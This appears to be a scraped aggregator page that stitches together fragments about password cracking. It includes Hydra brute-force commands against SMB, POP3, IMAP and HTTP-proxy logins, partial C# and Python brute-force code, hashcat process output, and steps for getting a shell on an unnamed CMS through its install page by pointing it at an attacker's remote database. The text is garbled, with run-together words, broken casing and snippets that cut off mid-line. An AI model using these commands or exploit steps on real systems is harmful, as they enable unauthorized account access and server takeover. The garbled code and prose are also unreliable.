crackedSmbService login account number and passwordusing the command:Hydra 127.0.0.1-l root-p p.txt SMB4 crackedPop3Service login account number and passworduse command:hydra-l root-p p.txt my.pop3.mail POP35 crackedImapService login account number and passworduse command:hydra-l root-p p.txt 192.168.1.30 IMAP6 crackedHttp-proxyService login account number and passworduse command:hydra-l root-p p.txt http-proxy://192.168.1.207 crackedRdpService login account number and passworduse command
Because we're going to be poor here. The password includes 0-9,a-z,a-z a total of 62 characters, so we use 62 binary to traverse.First, we implement a 10 binary to 62 binary method. private static char[] CharSet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ". ToCharArray (); private static string[] CharSet = {"0", "1", "2", "3", "4", "5", "6", "7", "8", "9",//
! This is the biggest problem! I suspect that it is not the brute-force mode, but the mask mode. But it is also strange that the CPU only uses 23%.Pid user pr ni virt res shr s % CPU % mem time + COMMAND13471 root 15 0 136 m 81 m 31 m S 23.3. 09 cudaHashcat-plu12 pid user pr ni virt res shr s % CPU % mem time + COMMAND 13471 root 15 0 136 m 81 m 31 m S 23.3 2.8. 09 cudaHashcat-pluStatus ......: RunningInput
Rice cms brute force getshell
SeeInstall \ index. php
Determine whether install. lck exists. However, the header does not exit. The page is only redirected, but the subsequent code will continue to be executed.Attackers can open mysql database outreach on their own servers. Then post data to this page
Step = 4 dbhost = Remote Server ip dbport = Port dbuser = Account dbpwd =
At run time, add the User.txt passwd.txt two file under its directory. Otherwise it will be an error. The program does not add exception handling. The code is a bit lame ...
Copy Code code as follows:
#coding: utf-8-
Import Base64
Import Urllib2
Import Queue
Import Threading,re,sys
Queue = Queue.queue ()
Class Rout_thread (threading. Thread):
def __init__ (SELF,QUEUE,PASSWD):
Threading. Thread.__init__ (self)Self.queue=queueself.passwordlist=passwddef run (self):Self.user=
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.